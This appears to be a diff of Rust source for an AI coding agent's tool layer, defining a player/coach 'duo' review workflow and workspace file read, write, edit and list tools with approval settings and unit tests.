"description": "Minimum compliance score for approval (0-1, default: 0.9)"
|
||||
}
|
||||
},
|
||||
"required": ["requirements"]
|
||||
})
|
||||
}
|
||||
|
||||
fn capabilities(&self) -> Vec<ToolCapability> {
|
||||
vec![ToolCapability::ReadOnly]
|
||||
}
|
||||
|
||||
fn approval_requirement(&self) -> ApprovalRequirement {
|
||||
ApprovalRequirement::Auto
|
||||
}
|
||||
|
||||
async fn execute(&self, input: Value, _context: &ToolContext) -> Result<ToolResult, ToolError> {
|
||||
let requirements = required_str(&input, "requirements")?;
|
||||
let max_turns = input
|
||||
.get("max_turns")
|
||||
.and_then(|v| v.as_u64())
|
||||
.map(|v| v as u32);
|
||||
let session_name = optional_str(&input, "session_name").map(str::to_string);
|
||||
let approval_threshold = input.get("approval_threshold").and_then(|v| v.as_f64());
|
||||
|
||||
let mut session = self
|
||||
.session
|
||||
.lock()
|
||||
.map_err(|_| ToolError::execution_failed("Failed to lock Duo session"))?;
|
||||
|
||||
let state = session.start_session(
|
||||
requirements.to_string(),
|
||||
session_name,
|
||||
max_turns,
|
||||
approval_threshold,
|
||||
);
|
||||
|
||||
let summary = state.summary();
|
||||
Ok(ToolResult::success(format!(
|
||||
"Duo session initialized. Ready for player phase.\n\n{}",
|
||||
summary
|
||||
)))
|
||||
}
|
||||
}
|
||||
|
||||
/// Generate the player prompt for implementation.
|
||||
pub struct DuoPlayerTool {
|
||||
session: SharedDuoSession,
|
||||
}
|
||||
|
||||
impl DuoPlayerTool {
|
||||
#[must_use]
|
||||
pub fn new(session: SharedDuoSession) -> Self {
|
||||
Self { session }
|
||||
}
|
||||
}
|
||||
|
||||
#[async_trait]
|
||||
impl ToolSpec for DuoPlayerTool {
|
||||
fn name(&self) -> &'static str {
|
||||
"duo_player"
|
||||
}
|
||||
|
||||
fn description(&self) -> &'static str {
|
||||
"Generate the player prompt for implementation. Must be in Init or Player phase. Call after implementing to advance to Coach phase."
|
||||
}
|
||||
|
||||
fn input_schema(&self) -> Value {
|
||||
json!({
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"implementation_summary": {
|
||||
"type": "string",
|
||||
"description": "Optional summary of implementation work done (recorded in history)"
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
fn capabilities(&self) -> Vec<ToolCapability> {
|
||||
vec![ToolCapability::ReadOnly]
|
||||
}
|
||||
|
||||
fn approval_requirement(&self) -> ApprovalRequirement {
|
||||
ApprovalRequirement::Auto
|
||||
}
|
||||
|
||||
async fn execute(&self, input: Value, _context: &ToolContext) -> Result<ToolResult, ToolError> {
|
||||
let implementation_summary = optional_str(&input, "implementation_summary")
|
||||
.map(str::to_string)
|
||||
.unwrap_or_else(|| "Implementation in progress".to_string());
|
||||
|
||||
let mut session = self
|
||||
.session
|
||||
.lock()
|
||||
.map_err(|_| ToolError::execution_failed("Failed to lock Duo session"))?;
|
||||
|
||||
let state = session
|
||||
.get_active_mut()
|
||||
.ok_or_else(|| ToolError::invalid_input("No active session. Call duo_init first."))?;
|
||||
|
||||
// Check we're in a valid phase for player
|
||||
match state.phase {
|
||||
DuoPhase::Init | DuoPhase::Player => {
|
||||
// Generate prompt first
|
||||
let prompt = generate_player_prompt(state);
|
||||
|
||||
// Advance to Coach phase
|
||||
state
|
||||
.advance_to_coach(implementation_summary)
|
||||
.map_err(|e| ToolError::execution_failed(e.to_string()))?;
|
||||
|
||||
Ok(ToolResult::success(format!(
|
||||
"=== PLAYER PROMPT ===\n\n{}\n\n---\nAdvanced to Coach phase. Use duo_coach for verification.",
|
||||
prompt
|
||||
)))
|
||||
}
|
||||
DuoPhase::Coach => Err(ToolError::invalid_input(
|
||||
"Already in Coach phase. Use duo_coach to get verification prompt.",
|
||||
)),
|
||||
DuoPhase::Approved => Err(ToolError::invalid_input(
|
||||
"Session already approved. Start a new session with duo_init.",
|
||||
)),
|
||||
DuoPhase::Timeout => Err(ToolError::invalid_input(
|
||||
"Session timed out. Start a new session with duo_init.",
|
||||
)),
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Generate the coach prompt for validation.
|
||||
pub struct DuoCoachTool {
|
||||
session: SharedDuoSession,
|
||||
}
|
||||
|
||||
impl DuoCoachTool {
|
||||
#[must_use]
|
||||
pub fn new(session: SharedDuoSession) -> Self {
|
||||
Self { session }
|
||||
}
|
||||
}
|
||||
|
||||
#[async_trait]
|
||||
impl ToolSpec for DuoCoachTool {
|
||||
fn name(&self) -> &'static str {
|
||||
"duo_coach"
|
||||
}
|
||||
|
||||
fn description(&self) -> &'static str {
|
||||
"Generate the coach prompt for validation. Must be in Coach phase. Does NOT advance state."
|
||||
}
|
||||
|
||||
fn input_schema(&self) -> Value {
|
||||
json!({
|
||||
"type": "object",
|
||||
"properties": {}
|
||||
})
|
||||
}
|
||||
|
||||
fn capabilities(&self) -> Vec<ToolCapability> {
|
||||
vec![ToolCapability::ReadOnly]
|
||||
}
|
||||
|
||||
fn approval_requirement(&self) -> ApprovalRequirement {
|
||||
ApprovalRequirement::Auto
|
||||
}
|
||||
|
||||
async fn execute(
|
||||
&self,
|
||||
_input: Value,
|
||||
_context: &ToolContext,
|
||||
) -> Result<ToolResult, ToolError> {
|
||||
let session = self
|
||||
.session
|
||||
.lock()
|
||||
.map_err(|_| ToolError::execution_failed("Failed to lock Duo session"))?;
|
||||
|
||||
let state = session
|
||||
.get_active()
|
||||
.ok_or_else(|| ToolError::invalid_input("No active session. Call duo_init first."))?;
|
||||
|
||||
if state.phase != DuoPhase::Coach {
|
||||
return Err(ToolError::invalid_input(format!(
|
||||
"Expected Coach phase, but current phase is {}. Use duo_player first.",
|
||||
state.phase
|
||||
)));
|
||||
}
|
||||
|
||||
let prompt = generate_coach_prompt(state);
|
||||
|
||||
Ok(ToolResult::success(format!(
|
||||
"=== COACH PROMPT ===\n\n{}\n\n---\nAfter verification, use duo_advance with feedback and approval status.",
|
||||
prompt
|
||||
)))
|
||||
}
|
||||
}
|
||||
|
||||
/// Advance the session after coach review.
|
||||
pub struct DuoAdvanceTool {
|
||||
session: SharedDuoSession,
|
||||
}
|
||||
|
||||
impl DuoAdvanceTool {
|
||||
#[must_use]
|
||||
pub fn new(session: SharedDuoSession) -> Self {
|
||||
Self { session }
|
||||
}
|
||||
}
|
||||
|
||||
#[async_trait]
|
||||
impl ToolSpec for DuoAdvanceTool {
|
||||
fn name(&self) -> &'static str {
|
||||
"duo_advance"
|
||||
}
|
||||
|
||||
fn description(&self) -> &'static str {
|
||||
"Advance the session after coach review. Updates turn count and records feedback. Returns new status."
|
||||
}
|
||||
|
||||
fn input_schema(&self) -> Value {
|
||||
json!({
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"feedback": {
|
||||
"type": "string",
|
||||
"description": "The coach's feedback text (compliance checklist and actions needed)"
|
||||
},
|
||||
"approved": {
|
||||
"type": "boolean",
|
||||
"description": "Whether the coach approved the implementation (look for 'COACH APPROVED')"
|
||||
},
|
||||
"compliance_score": {
|
||||
"type": "number",
|
||||
"description": "Optional compliance score (0-1) based on checklist items satisfied"
|
||||
}
|
||||
},
|
||||
"required": ["feedback", "approved"]
|
||||
})
|
||||
}
|
||||
|
||||
fn capabilities(&self) -> Vec<ToolCapability> {
|
||||
vec![ToolCapability::ReadOnly]
|
||||
}
|
||||
|
||||
fn approval_requirement(&self) -> ApprovalRequirement {
|
||||
ApprovalRequirement::Auto
|
||||
}
|
||||
|
||||
async fn execute(&self, input: Value, _context: &ToolContext) -> Result<ToolResult, ToolError> {
|
||||
let feedback = required_str(&input, "feedback")?;
|
||||
let approved = input
|
||||
.get("approved")
|
||||
.and_then(|v| v.as_bool())
|
||||
.ok_or_else(|| ToolError::missing_field("approved"))?;
|
||||
let compliance_score = input.get("compliance_score").and_then(|v| v.as_f64());
|
||||
|
||||
let mut session = self
|
||||
.session
|
||||
.lock()
|
||||
.map_err(|_| ToolError::execution_failed("Failed to lock Duo session"))?;
|
||||
|
||||
let state = session
|
||||
.get_active_mut()
|
||||
.ok_or_else(|| ToolError::invalid_input("No active session. Call duo_init first."))?;
|
||||
|
||||
if state.phase != DuoPhase::Coach {
|
||||
return Err(ToolError::invalid_input(format!(
|
||||
"Expected Coach phase, but current phase is {}",
|
||||
state.phase
|
||||
)));
|
||||
}
|
||||
|
||||
// Advance the turn
|
||||
state
|
||||
.advance_turn(feedback.to_string(), approved, compliance_score)
|
||||
.map_err(|e| ToolError::execution_failed(e.to_string()))?;
|
||||
|
||||
// Determine status message based on new phase
|
||||
let status_msg = match state.phase {
|
||||
DuoPhase::Approved => "🎉 APPROVED! All requirements verified.",
|
||||
DuoPhase::Timeout => "⏰ TIMEOUT. Max turns reached without approval.",
|
||||
DuoPhase::Player => "🔄 Continuing to next player turn...",
|
||||
_ => "Session updated.",
|
||||
};
|
||||
|
||||
let summary = state.summary();
|
||||
let mut result = ToolResult::success(format!("{}\n\n{}", status_msg, summary));
|
||||
result.metadata = Some(json!({
|
||||
"phase": state.phase.to_string(),
|
||||
"status": state.status.to_string(),
|
||||
"turn": state.current_turn,
|
||||
"max_turns": state.max_turns,
|
||||
"approved": approved,
|
||||
"compliance_score": compliance_score,
|
||||
"is_complete": state.is_complete(),
|
||||
}));
|
||||
|
||||
Ok(result)
|
||||
}
|
||||
}
|
||||
|
||||
/// Show the current session status.
|
||||
pub struct DuoStatusTool {
|
||||
session: SharedDuoSession,
|
||||
}
|
||||
|
||||
impl DuoStatusTool {
|
||||
#[must_use]
|
||||
pub fn new(session: SharedDuoSession) -> Self {
|
||||
Self { session }
|
||||
}
|
||||
}
|
||||
|
||||
#[async_trait]
|
||||
impl ToolSpec for DuoStatusTool {
|
||||
fn name(&self) -> &'static str {
|
||||
"duo_status"
|
||||
}
|
||||
|
||||
fn description(&self) -> &'static str {
|
||||
"Show the current Duo session status including phase, turn count, and requirements."
|
||||
}
|
||||
|
||||
fn input_schema(&self) -> Value {
|
||||
json!({
|
||||
"type": "object",
|
||||
"properties": {}
|
||||
})
|
||||
}
|
||||
|
||||
fn capabilities(&self) -> Vec<ToolCapability> {
|
||||
vec![ToolCapability::ReadOnly]
|
||||
}
|
||||
|
||||
fn approval_requirement(&self) -> ApprovalRequirement {
|
||||
ApprovalRequirement::Auto
|
||||
}
|
||||
|
||||
async fn execute(
|
||||
&self,
|
||||
_input: Value,
|
||||
_context: &ToolContext,
|
||||
) -> Result<ToolResult, ToolError> {
|
||||
let session = self
|
||||
.session
|
||||
.lock()
|
||||
.map_err(|_| ToolError::execution_failed("Failed to lock Duo session"))?;
|
||||
|
||||
Ok(ToolResult::success(session_summary(&session)))
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
use crate::duo::new_shared_duo_session;
|
||||
|
||||
#[test]
|
||||
fn test_duo_init_tool_schema() {
|
||||
let session = new_shared_duo_session();
|
||||
let tool = DuoInitTool::new(session);
|
||||
|
||||
assert_eq!(tool.name(), "duo_init");
|
||||
assert_eq!(tool.approval_requirement(), ApprovalRequirement::Auto);
|
||||
|
||||
let schema = tool.input_schema();
|
||||
assert!(schema.get("properties").is_some());
|
||||
assert!(
|
||||
schema["required"]
|
||||
.as_array()
|
||||
.unwrap()
|
||||
.contains(&json!("requirements"))
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_duo_player_tool_schema() {
|
||||
let session = new_shared_duo_session();
|
||||
let tool = DuoPlayerTool::new(session);
|
||||
|
||||
assert_eq!(tool.name(), "duo_player");
|
||||
assert_eq!(tool.approval_requirement(), ApprovalRequirement::Auto);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_duo_coach_tool_schema() {
|
||||
let session = new_shared_duo_session();
|
||||
let tool = DuoCoachTool::new(session);
|
||||
|
||||
assert_eq!(tool.name(), "duo_coach");
|
||||
assert_eq!(tool.approval_requirement(), ApprovalRequirement::Auto);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_duo_advance_tool_schema() {
|
||||
let session = new_shared_duo_session();
|
||||
let tool = DuoAdvanceTool::new(session);
|
||||
|
||||
assert_eq!(tool.name(), "duo_advance");
|
||||
assert_eq!(tool.approval_requirement(), ApprovalRequirement::Auto);
|
||||
|
||||
let schema = tool.input_schema();
|
||||
let required = schema["required"].as_array().unwrap();
|
||||
assert!(required.contains(&json!("feedback")));
|
||||
assert!(required.contains(&json!("approved")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_duo_status_tool_schema() {
|
||||
let session = new_shared_duo_session();
|
||||
let tool = DuoStatusTool::new(session);
|
||||
|
||||
assert_eq!(tool.name(), "duo_status");
|
||||
assert_eq!(tool.approval_requirement(), ApprovalRequirement::Auto);
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,540 @@
|
||||
//! File system tools: `read_file`, `write_file`, `edit_file`, `list_dir`
|
||||
//!
|
||||
//! These tools provide safe file system operations within the workspace,
|
||||
//! with path validation to prevent escaping the workspace boundary.
|
||||
|
||||
use super::spec::{
|
||||
ApprovalRequirement, ToolCapability, ToolContext, ToolError, ToolResult, ToolSpec,
|
||||
optional_str, required_str,
|
||||
};
|
||||
use async_trait::async_trait;
|
||||
use serde_json::{Value, json};
|
||||
use std::fs;
|
||||
|
||||
// === ReadFileTool ===
|
||||
|
||||
/// Tool for reading UTF-8 files from the workspace.
|
||||
pub struct ReadFileTool;
|
||||
|
||||
#[async_trait]
|
||||
impl ToolSpec for ReadFileTool {
|
||||
fn name(&self) -> &'static str {
|
||||
"read_file"
|
||||
}
|
||||
|
||||
fn description(&self) -> &'static str {
|
||||
"Read a UTF-8 file from the workspace."
|
||||
}
|
||||
|
||||
fn input_schema(&self) -> Value {
|
||||
json!({
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"path": {
|
||||
"type": "string",
|
||||
"description": "Path to the file (relative to workspace or absolute)"
|
||||
}
|
||||
},
|
||||
"required": ["path"]
|
||||
})
|
||||
}
|
||||
|
||||
fn capabilities(&self) -> Vec<ToolCapability> {
|
||||
vec![ToolCapability::ReadOnly, ToolCapability::Sandboxable]
|
||||
}
|
||||
|
||||
fn supports_parallel(&self) -> bool {
|
||||
true
|
||||
}
|
||||
|
||||
async fn execute(&self, input: Value, context: &ToolContext) -> Result<ToolResult, ToolError> {
|
||||
let path_str = required_str(&input, "path")?;
|
||||
let file_path = context.resolve_path(path_str)?;
|
||||
|
||||
let contents = fs::read_to_string(&file_path).map_err(|e| {
|
||||
ToolError::execution_failed(format!("Failed to read {}: {}", file_path.display(), e))
|
||||
})?;
|
||||
|
||||
Ok(ToolResult::success(contents))
|
||||
}
|
||||
}
|
||||
|
||||
// === WriteFileTool ===
|
||||
|
||||
/// Tool for writing UTF-8 files to the workspace.
|
||||
pub struct WriteFileTool;
|
||||
|
||||
#[async_trait]
|
||||
impl ToolSpec for WriteFileTool {
|
||||
fn name(&self) -> &'static str {
|
||||
"write_file"
|
||||
}
|
||||
|
||||
fn description(&self) -> &'static str {
|
||||
"Write content to a UTF-8 file in the workspace."
|
||||
}
|
||||
|
||||
fn input_schema(&self) -> Value {
|
||||
json!({
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"path": {
|
||||
"type": "string",
|
||||
"description": "Path to the file"
|
||||
},
|
||||
"content": {
|
||||
"type": "string",
|
||||
"description": "Content to write"
|
||||
}
|
||||
},
|
||||
"required": ["path", "content"]
|
||||
})
|
||||
}
|
||||
|
||||
fn capabilities(&self) -> Vec<ToolCapability> {
|
||||
vec![
|
||||
ToolCapability::WritesFiles,
|
||||
ToolCapability::Sandboxable,
|
||||
ToolCapability::RequiresApproval,
|
||||
]
|
||||
}
|
||||
|
||||
fn approval_requirement(&self) -> ApprovalRequirement {
|
||||
ApprovalRequirement::Suggest
|
||||
}
|
||||
|
||||
async fn execute(&self, input: Value, context: &ToolContext) -> Result<ToolResult, ToolError> {
|
||||
let path_str = required_str(&input, "path")?;
|
||||
let file_content = required_str(&input, "content")?;
|
||||
|
||||
let file_path = context.resolve_path(path_str)?;
|
||||
|
||||
// Create parent directories if needed
|
||||
if let Some(parent) = file_path.parent() {
|
||||
fs::create_dir_all(parent).map_err(|e| {
|
||||
ToolError::execution_failed(format!(
|
||||
"Failed to create directory {}: {}",
|
||||
parent.display(),
|
||||
e
|
||||
))
|
||||
})?;
|
||||
}
|
||||
|
||||
fs::write(&file_path, file_content).map_err(|e| {
|
||||
ToolError::execution_failed(format!("Failed to write {}: {}", file_path.display(), e))
|
||||
})?;
|
||||
|
||||
Ok(ToolResult::success(format!(
|
||||
"Wrote {} bytes to {}",
|
||||
file_content.len(),
|
||||
file_path.display()
|
||||
)))
|
||||
}
|
||||
}
|
||||
|
||||
// === EditFileTool ===
|
||||
|
||||
/// Tool for search/replace editing of files.
|
||||
pub struct EditFileTool;
|
||||
|
||||
#[async_trait]
|
||||
impl ToolSpec for EditFileTool {
|
||||
fn name(&self) -> &'static str {
|
||||
"edit_file"
|
||||
}
|
||||
|
||||
fn description(&self) -> &'static str {
|
||||
"Replace text in a file using search/replace."
|
||||
}
|
||||
|
||||
fn input_schema(&self) -> Value {
|
||||
json!({
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"path": {
|
||||
"type": "string",
|
||||
"description": "Path to the file"
|
||||
},
|
||||
"search": {
|
||||
"type": "string",
|
||||
"description": "Text to search for"
|
||||
},
|
||||
"replace": {
|
||||
"type": "string",
|
||||
"description": "Text to replace with"
|
||||
}
|
||||
},
|
||||
"required": ["path", "search", "replace"]
|
||||
})
|
||||
}
|
||||
|
||||
fn capabilities(&self) -> Vec<ToolCapability> {
|
||||
vec![
|
||||
ToolCapability::WritesFiles,
|
||||
ToolCapability::Sandboxable,
|
||||
ToolCapability::RequiresApproval,
|
||||
]
|
||||
}
|
||||
|
||||
fn approval_requirement(&self) -> ApprovalRequirement {
|
||||
ApprovalRequirement::Suggest
|
||||
}
|
||||
|
||||
async fn execute(&self, input: Value, context: &ToolContext) -> Result<ToolResult, ToolError> {
|
||||
let path_str = required_str(&input, "path")?;
|
||||
let search = required_str(&input, "search")?;
|
||||
let replace = required_str(&input, "replace")?;
|
||||
|
||||
let file_path = context.resolve_path(path_str)?;
|
||||
|
||||
let contents = fs::read_to_string(&file_path).map_err(|e| {
|
||||
ToolError::execution_failed(format!("Failed to read {}: {}", file_path.display(), e))
|
||||
})?;
|
||||
|
||||
let count = contents.matches(search).count();
|
||||
if count == 0 {
|
||||
return Err(ToolError::execution_failed(format!(
|
||||
"Search string not found in {}",
|
||||
file_path.display()
|
||||
)));
|
||||
}
|
||||
|
||||
let updated = contents.replace(search, replace);
|
||||
|
||||
fs::write(&file_path, &updated).map_err(|e| {
|
||||
ToolError::execution_failed(format!("Failed to write {}: {}", file_path.display(), e))
|
||||
})?;
|
||||
|
||||
Ok(ToolResult::success(format!(
|
||||
"Replaced {} occurrence(s) in {}",
|
||||
count,
|
||||
file_path.display()
|
||||
)))
|
||||
}
|
||||
}
|
||||
|
||||
// === ListDirTool ===
|
||||
|
||||
/// Tool for listing directory contents.
|
||||
pub struct ListDirTool;
|
||||
|
||||
#[async_trait]
|
||||
impl ToolSpec for ListDirTool {
|
||||
fn name(&self) -> &'static str {
|
||||
"list_dir"
|
||||
}
|
||||
|
||||
fn description(&self) -> &'static str {
|
||||
"List entries in a directory relative to the workspace."
|
||||
}
|
||||
|
||||
fn input_schema(&self) -> Value {
|
||||
json!({
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"path": {
|
||||
"type": "string",
|
||||
"description": "Relative path (default: .)"
|
||||
}
|
||||
},
|
||||
"required": []
|
||||
})
|
||||
}
|
||||
|
||||
fn capabilities(&self) -> Vec<ToolCapability> {
|
||||
vec![ToolCapability::ReadOnly, ToolCapability::Sandboxable]
|
||||
}
|
||||
|
||||
fn supports_parallel(&self) -> bool {
|
||||
true
|
||||
}
|
||||
|
||||
async fn execute(&self, input: Value, context: &ToolContext) -> Result<ToolResult, ToolError> {
|
||||
let path_str = optional_str(&input, "path").unwrap_or(".");
|
||||
let dir_path = context.resolve_path(path_str)?;
|
||||
|
||||
let mut entries = Vec::new();
|
||||
|
||||
for entry in fs::read_dir(&dir_path).map_err(|e| {
|
||||
ToolError::execution_failed(format!(
|
||||
"Failed to read directory {}: {}",
|
||||
dir_path.display(),
|
||||
e
|
||||
))
|
||||
})? {
|
||||
let entry = entry.map_err(|e| ToolError::execution_failed(e.to_string()))?;
|
||||
let file_type = entry
|
||||
.file_type()
|
||||
.map_err(|e| ToolError::execution_failed(e.to_string()))?;
|
||||
|
||||
entries.push(json!({
|
||||
"name": entry.file_name().to_string_lossy().to_string(),
|
||||
"is_dir": file_type.is_dir(),
|
||||
}));
|
||||
}
|
||||
|
||||
ToolResult::json(&entries).map_err(|e| ToolError::execution_failed(e.to_string()))
|
||||
}
|
||||
}
|
||||
|
||||
// === Unit Tests ===
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
use tempfile::tempdir;
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_read_file_tool() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let ctx = ToolContext::new(tmp.path().to_path_buf());
|
||||
|
||||
// Create a test file
|
||||
let test_file = tmp.path().join("test.txt");
|
||||
fs::write(&test_file, "hello world").expect("write");
|
||||
|
||||
let tool = ReadFileTool;
|
||||
let result = tool
|
||||
.execute(json!({"path": "test.txt"}), &ctx)
|
||||
.await
|
||||
.expect("execute");
|
||||
|
||||
assert!(result.success);
|
||||
assert_eq!(result.content, "hello world");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_read_file_not_found() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let ctx = ToolContext::new(tmp.path().to_path_buf());
|
||||
|
||||
let tool = ReadFileTool;
|
||||
let result = tool.execute(json!({"path": "nonexistent.txt"}), &ctx).await;
|
||||
|
||||
assert!(result.is_err());
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_read_file_missing_path() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let ctx = ToolContext::new(tmp.path().to_path_buf());
|
||||
|
||||
let tool = ReadFileTool;
|
||||
let result = tool.execute(json!({}), &ctx).await;
|
||||
|
||||
assert!(result.is_err());
|
||||
let err = result.unwrap_err();
|
||||
assert!(
|
||||
err.to_string()
|
||||
.contains("Failed to validate input: missing required field 'path'")
|
||||
);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_write_file_tool() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let ctx = ToolContext::new(tmp.path().to_path_buf());
|
||||
|
||||
let tool = WriteFileTool;
|
||||
let result = tool
|
||||
.execute(
|
||||
json!({"path": "output.txt", "content": "test content"}),
|
||||
&ctx,
|
||||
)
|
||||
.await
|
||||
.expect("execute");
|
||||
|
||||
assert!(result.success);
|
||||
assert!(result.content.contains("Wrote"));
|
||||
|
||||
// Verify file was written
|
||||
let written = fs::read_to_string(tmp.path().join("output.txt")).expect("read");
|
||||
assert_eq!(written, "test content");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_write_file_creates_dirs() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let ctx = ToolContext::new(tmp.path().to_path_buf());
|
||||
|
||||
let tool = WriteFileTool;
|
||||
let result = tool
|
||||
.execute(
|
||||
json!({"path": "subdir/nested/file.txt", "content": "nested content"}),
|
||||
&ctx,
|
||||
)
|
||||
.await
|
||||
.expect("execute");
|
||||
|
||||
assert!(result.success);
|
||||
|
||||
// Verify nested file was created
|
||||
let written = fs::read_to_string(tmp.path().join("subdir/nested/file.txt")).expect("read");
|
||||
assert_eq!(written, "nested content");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_edit_file_tool() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let ctx = ToolContext::new(tmp.path().to_path_buf());
|
||||
|
||||
// Create a file to edit
|
||||
let test_file = tmp.path().join("edit_me.txt");
|
||||
fs::write(&test_file, "hello world hello").expect("write");
|
||||
|
||||
let tool = EditFileTool;
|
||||
let result = tool
|
||||
.execute(
|
||||
json!({"path": "edit_me.txt", "search": "hello", "replace": "hi"}),
|
||||
&ctx,
|
||||
)
|
||||
.await
|
||||
.expect("execute");
|
||||
|
||||
assert!(result.success);
|
||||
assert!(result.content.contains("2 occurrence(s)"));
|
||||
|
||||
// Verify edit was applied
|
||||
let edited = fs::read_to_string(&test_file).expect("read");
|
||||
assert_eq!(edited, "hi world hi");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_edit_file_not_found() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let ctx = ToolContext::new(tmp.path().to_path_buf());
|
||||
|
||||
// Create a file without the search string
|
||||
let test_file = tmp.path().join("no_match.txt");
|
||||
fs::write(&test_file, "foo bar baz").expect("write");
|
||||
|
||||
let tool = EditFileTool;
|
||||
let result = tool
|
||||
.execute(
|
||||
json!({"path": "no_match.txt", "search": "hello", "replace": "hi"}),
|
||||
&ctx,
|
||||
)
|
||||
.await;
|
||||
|
||||
assert!(result.is_err());
|
||||
let err = result.unwrap_err();
|
||||
assert!(err.to_string().contains("not found"));
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_list_dir_tool() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let ctx = ToolContext::new(tmp.path().to_path_buf());
|
||||
|
||||
// Create some files and directories
|
||||
fs::write(tmp.path().join("file1.txt"), "").expect("write");
|
||||
fs::write(tmp.path().join("file2.txt"), "").expect("write");
|
||||
fs::create_dir(tmp.path().join("subdir")).expect("mkdir");
|
||||
|
||||
let tool = ListDirTool;
|
||||
let result = tool.execute(json!({}), &ctx).await.expect("execute");
|
||||
|
||||
assert!(result.success);
|
||||
assert!(result.content.contains("file1.txt"));
|
||||
assert!(result.content.contains("file2.txt"));
|
||||
assert!(result.content.contains("subdir"));
|
||||
assert!(result.content.contains("\"is_dir\": true"));
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_list_dir_with_path() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let ctx = ToolContext::new(tmp.path().to_path_buf());
|
||||
|
||||
// Create a subdirectory with files
|
||||
let subdir = tmp.path().join("mydir");
|
||||
fs::create_dir(&subdir).expect("mkdir");
|
||||
fs::write(subdir.join("nested.txt"), "").expect("write");
|
||||
|
||||
let tool = ListDirTool;
|
||||
let result = tool
|
||||
.execute(json!({"path": "mydir"}), &ctx)
|
||||
.await
|
||||
.expect("execute");
|
||||
|
||||
assert!(result.success);
|
||||
assert!(result.content.contains("nested.txt"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_read_file_tool_properties() {
|
||||
let tool = ReadFileTool;
|
||||
assert_eq!(tool.name(), "read_file");
|
||||
assert!(tool.is_read_only());
|
||||
assert!(tool.is_sandboxable());
|
||||
assert_eq!(tool.approval_requirement(), ApprovalRequirement::Auto);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_write_file_tool_properties() {
|
||||
let tool = WriteFileTool;
|
||||
assert_eq!(tool.name(), "write_file");
|
||||
assert!(!tool.is_read_only());
|
||||
assert!(tool.is_sandboxable());
|
||||
assert_eq!(tool.approval_requirement(), ApprovalRequirement::Suggest);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_edit_file_tool_properties() {
|
||||
let tool = EditFileTool;
|
||||
assert_eq!(tool.name(), "edit_file");
|
||||
assert!(!tool.is_read_only());
|
||||
assert!(tool.is_sandboxable());
|
||||
assert_eq!(tool.approval_requirement(), ApprovalRequirement::Suggest);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_list_dir_tool_properties() {
|
||||
let tool = ListDirTool;
|
||||
assert_eq!(tool.name(), "list_dir");
|
||||
assert!(tool.is_read_only());
|
||||
assert!(tool.is_sandboxable());
|
||||
assert_eq!(tool.approval_requirement(), ApprovalRequirement::Auto);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_parallel_support_flags() {
|
||||
let read_tool = ReadFileTool;
|
||||
let list_tool = ListDirTool;
|
||||
let write_tool = WriteFileTool;
|
||||
|
||||
assert!(read_tool.supports_parallel());
|
||||
assert!(list_tool.supports_parallel());
|
||||
assert!(!write_tool.supports_parallel());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_input_schemas() {
|
||||
// Verify all tools have valid JSON schemas
|
||||
let read_schema = ReadFileTool.input_schema();
|
||||
assert!(read_schema.get("type").is_some());
|
||||
assert!(read_schema.get("properties").is_some());
|
||||
|
||||
let write_schema = WriteFileTool.input_schema();
|
||||
let required = write_schema
|
||||
.get("required")
|
||||
.and_then(|value| value.as_array())
|
||||
.expect("write schema should include required array");
|
||||
assert!(required.iter().any(|v| v.as_str() == Some("path")));
|
||||
assert!(required.iter().any(|v| v.as_str() == Some("content")));
|
||||
|
||||
let edit_schema = EditFileTool.input_schema();
|
||||
let required = edit_schema
|
||||
.get("required")
|
||||
.and_then(|value| value.as_array())
|
||||
.expect("edit schema should include required array");
|
||||
assert_eq!(required.len(), 3);
|
||||
|
||||
let list_schema = ListDirTool.input_schema();
|
||||
let required = list_schema
|
||||
.get("required")
|
||||
.and_then(|value| value.as_array())
|
||||
.expect("list schema should include required array");
|
||||
assert!(required.is_empty()); // path is optional
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,53 @@
|
||||
//! Tool system modules and re-exports.
|
||||
|
||||
#![allow(dead_code, unused_imports)]
|
||||
|
||||
// === Modules ===
|
||||
|
||||
pub mod duo;
|
||||
pub mod file;
|
||||
pub mod patch;
|
||||
pub mod plan;
|
||||
pub mod registry;
|
||||
pub mod rlm;
|
||||
pub mod search;
|
||||
pub mod shell;
|
